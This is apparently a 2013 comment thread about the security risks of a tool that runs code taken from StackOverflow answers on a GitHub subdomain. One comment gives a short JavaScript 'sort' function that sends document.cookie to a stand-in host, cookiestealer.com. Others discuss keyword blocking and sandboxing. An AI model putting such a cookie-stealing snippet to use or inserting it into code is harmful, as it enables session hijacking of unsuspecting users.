Quick someone write a 'sort' that steals github session cookies. ;P

gkoberger · on March 18, 2013

I only search answers posted before the comic was released for this reason :) (Also, I block any code that uses the word "cookie")

Plus, I'm assuming that since they let anyone run arbitrary code on subdomains, they've thought this through.

VMG · on March 18, 2013

> Also, I block any code that uses the word "cookie"

That is so incredibly ineffective that you could just as well leave it out. Maybe have a look at https://github.com/jterrace/js.js for a sandboxed environment.

_dark_matter_ · on March 18, 2013

Quick, someone edit your code that has "javascript" and "sort" as keywords so it steals session cookies!

vnorby · on March 18, 2013

This won't work on Github's subdomain, but you'd do it like this:

  function sort(data) {
     $('body').append('<script src="http://cookiestealer.com/log.js?cookie= + document.cookie + '"></script>");
     return data.sort();
  }

c-oreills · on March 18, 2013

Dammit, just as I was about to write a

function sortArray(a) { alert('Hello StackSort!') }

Question/Answer. =( Good foresight!

gkoberger · on March 18, 2013

I also don't allow alerts :)

petenixey · on March 18, 2013

This is a really cool script you've written and made me laugh out loud.

It would be a shame though if someone edited / republished / whatever an old script and used it to steal people's github cookies (your code wouldn't be able to filter someone calling a remote script which then ran its own code for instance or a script that evaled a new script based on a string / unicode etc.)

It might be best to just run the code in a frame that's not hosted on Github then you're safe.

calebegg · on March 18, 2013

I think they thought it through, but there are still issues:

https://news.ycombinator.com/item?id=5347430